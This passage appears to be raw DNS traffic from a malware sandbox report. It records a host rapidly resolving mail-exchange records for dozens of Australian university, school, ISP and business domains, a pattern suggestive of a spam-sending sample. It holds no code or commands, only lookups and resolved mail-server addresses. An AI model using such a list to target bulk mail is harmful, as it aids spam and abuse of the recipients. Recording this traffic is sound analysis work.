                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.526853085 CET8.8.8.8192.168.2.30x1101No error (0)chem.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.530802011 CET8.8.8.8192.168.2.30x4b05No error (0)mx.emea.email.fireeyecloud.com3.123.5.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.530802011 CET8.8.8.8192.168.2.30x4b05No error (0)mx.emea.email.fireeyecloud.com63.34.218.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.530802011 CET8.8.8.8192.168.2.30x4b05No error (0)mx.emea.email.fireeyecloud.com63.34.218.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.530802011 CET8.8.8.8192.168.2.30x4b05No error (0)mx.emea.email.fireeyecloud.com63.34.218.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.549005985 CET8.8.8.8192.168.2.30x99f1No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.549005985 CET8.8.8.8192.168.2.30x99f1No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.549005985 CET8.8.8.8192.168.2.30x99f1No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.549005985 CET8.8.8.8192.168.2.30x99f1No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.603200912 CET8.8.8.8192.168.2.30xe143No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.603200912 CET8.8.8.8192.168.2.30xe143No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.603200912 CET8.8.8.8192.168.2.30xe143No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.622833967 CET8.8.8.8192.168.2.30xa1c5No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.761054039 CET8.8.8.8192.168.2.30x7d06No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.761054039 CET8.8.8.8192.168.2.30x7d06No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.761054039 CET8.8.8.8192.168.2.30x7d06No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.787034035 CET8.8.8.8192.168.2.30xd589No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.848825932 CET8.8.8.8192.168.2.30x4523No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.874027967 CET8.8.8.8192.168.2.30x4317No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.052947044 CET8.8.8.8192.168.2.30xf7f4No error (0)netconnect.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.073092937 CET8.8.8.8192.168.2.30x73d6No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.160139084 CET8.8.8.8192.168.2.30xc8b3No error (0)edumail.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.191930056 CET8.8.8.8192.168.2.30xcff2No error (0)edumail-vic-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.191930056 CET8.8.8.8192.168.2.30xcff2No error (0)edumail-vic-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.237504959 CET8.8.8.8192.168.2.30x5d77No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.237504959 CET8.8.8.8192.168.2.30x5d77No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.237504959 CET8.8.8.8192.168.2.30x5d77No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.256423950 CET8.8.8.8192.168.2.30xdd2No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.295821905 CET8.8.8.8192.168.2.30x1483No error (0)student.uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.295821905 CET8.8.8.8192.168.2.30x1483No error (0)student.uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.330594063 CET8.8.8.8192.168.2.30xc884No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.330594063 CET8.8.8.8192.168.2.30xc884No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.330594063 CET8.8.8.8192.168.2.30xc884No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.330594063 CET8.8.8.8192.168.2.30xc884No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.387984991 CET8.8.8.8192.168.2.30xe7a8No error (0)student.uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.433980942 CET8.8.8.8192.168.2.30xeb1aNo error (0)student-uq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.433980942 CET8.8.8.8192.168.2.30xeb1aNo error (0)student-uq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.515748024 CET8.8.8.8192.168.2.30xa917No error (0)onqhr.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.559243917 CET8.8.8.8192.168.2.30x6141No error (0)onqhr-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.559243917 CET8.8.8.8192.168.2.30x6141No error (0)onqhr-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.809895992 CET8.8.8.8192.168.2.30xeb02Name error (3)yhoo.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.819159031 CET8.8.8.8192.168.2.30x2b92No error (0)aviva.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.824754000 CET8.8.8.8192.168.2.30xe77bNo error (0)datafast.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.824754000 CET8.8.8.8192.168.2.30xe77bNo error (0)datafast.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.824754000 CET8.8.8.8192.168.2.30xe77bNo error (0)datafast.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.837363005 CET8.8.8.8192.168.2.30x9b09No error (0)park-mx.above.com103.224.212.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.851531982 CET8.8.8.8192.168.2.30x26d0No error (0)mx1.eftel.com203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.851531982 CET8.8.8.8192.168.2.30x26d0No error (0)mx1.eftel.com203.134.153.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.927532911 CET8.8.8.8192.168.2.30xd13bNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.946036100 CET8.8.8.8192.168.2.30xea93No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.946036100 CET8.8.8.8192.168.2.30xea93No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.062752962 CET8.8.8.8192.168.2.30xe15fNo error (0)hospitalityinns.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.220139980 CET8.8.8.8192.168.2.30x948fNo error (0)hospitalityinns-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.220139980 CET8.8.8.8192.168.2.30x948fNo error (0)hospitalityinns-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.246189117 CET8.8.8.8192.168.2.30xc75eNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.246189117 CET8.8.8.8192.168.2.30xc75eNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.264607906 CET8.8.8.8192.168.2.30x87caNo error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.340800047 CET8.8.8.8192.168.2.30xc184No error (0)autumnthreads.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.340800047 CET8.8.8.8192.168.2.30xc184No error (0)autumnthreads.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.340800047 CET8.8.8.8192.168.2.30xc184No error (0)autumnthreads.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.340800047 CET8.8.8.8192.168.2.30xc184No error (0)autumnthreads.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.352284908 CET8.8.8.8192.168.2.30x8defName error (3)petalproductions.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.361243010 CET8.8.8.8192.168.2.30xe8edNo error (0)mx2.email-hosting.net.au43.250.142.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.361243010 CET8.8.8.8192.168.2.30xe8edNo error (0)mx2.email-hosting.net.au103.252.153.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.361243010 CET8.8.8.8192.168.2.30xe8edNo error (0)mx2.email-hosting.net.au103.252.152.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.361243010 CET8.8.8.8192.168.2.30xe8edNo error (0)mx2.email-hosting.net.au103.252.152.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.401175022 CET8.8.8.8192.168.2.30x8390No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.420288086 CET8.8.8.8192.168.2.30x1ea5No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.541098118 CET8.8.8.8192.168.2.30x5cdaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.541098118 CET8.8.8.8192.168.2.30x5cdaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.541098118 CET8.8.8.8192.168.2.30x5cdaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.571043968 CET8.8.8.8192.168.2.30x93bdNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.597543001 CET8.8.8.8192.168.2.30x2fc1No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.621350050 CET8.8.8.8192.168.2.30x379fNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.683634043 CET8.8.8.8192.168.2.30xca2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.683634043 CET8.8.8.8192.168.2.30xca2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.683634043 CET8.8.8.8192.168.2.30xca2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.705168009 CET8.8.8.8192.168.2.30xcd30No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.723893881 CET8.8.8.8192.168.2.30xed44No error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.742914915 CET8.8.8.8192.168.2.30xa31No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.754915953 CET8.8.8.8192.168.2.30x1560No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.754915953 CET8.8.8.8192.168.2.30x1560No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.769653082 CET8.8.8.8192.168.2.30x3713No error (0)student.kings.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.799523115 CET8.8.8.8192.168.2.30x8a14No error (0)d502212.a.ess.au.barracudanetworks.com3.24.133.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.799523115 CET8.8.8.8192.168.2.30x8a14No error (0)d502212.a.ess.au.barracudanetworks.com3.24.133.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.799523115 CET8.8.8.8192.168.2.30x8a14No error (0)d502212.a.ess.au.barracudanetworks.com3.24.133.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.837336063 CET8.8.8.8192.168.2.30x75c5No error (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.905596018 CET8.8.8.8192.168.2.30xa257No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.905596018 CET8.8.8.8192.168.2.30xa257No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.905596018 CET8.8.8.8192.168.2.30xa257No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.925797939 CET8.8.8.8192.168.2.30x4419No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.015687943 CET8.8.8.8192.168.2.30x79d1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.015687943 CET8.8.8.8192.168.2.30x79d1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.015687943 CET8.8.8.8192.168.2.30x79d1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.036062956 CET8.8.8.8192.168.2.30xcafcNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.044743061 CET8.8.8.8192.168.2.30x2d85No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.044743061 CET8.8.8.8192.168.2.30x2d85No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.088916063 CET8.8.8.8192.168.2.30x96feNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.088916063 CET8.8.8.8192.168.2.30x96feNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.116338015 CET8.8.8.8192.168.2.30xe313No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.138861895 CET8.8.8.8192.168.2.30x15a5No error (0)mx-ctdodo.gtm.oss-core.net203.134.153.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.138861895 CET8.8.8.8192.168.2.30x15a5No error (0)mx-ctdodo.gtm.oss-core.net203.134.71.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.172372103 CET8.8.8.8192.168.2.30x781aNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.196497917 CET8.8.8.8192.168.2.30x114eNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.366811037 CET8.8.8.8192.168.2.30x79d7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.366811037 CET8.8.8.8192.168.2.30x79d7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.366811037 CET8.8.8.8192.168.2.30x79d7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
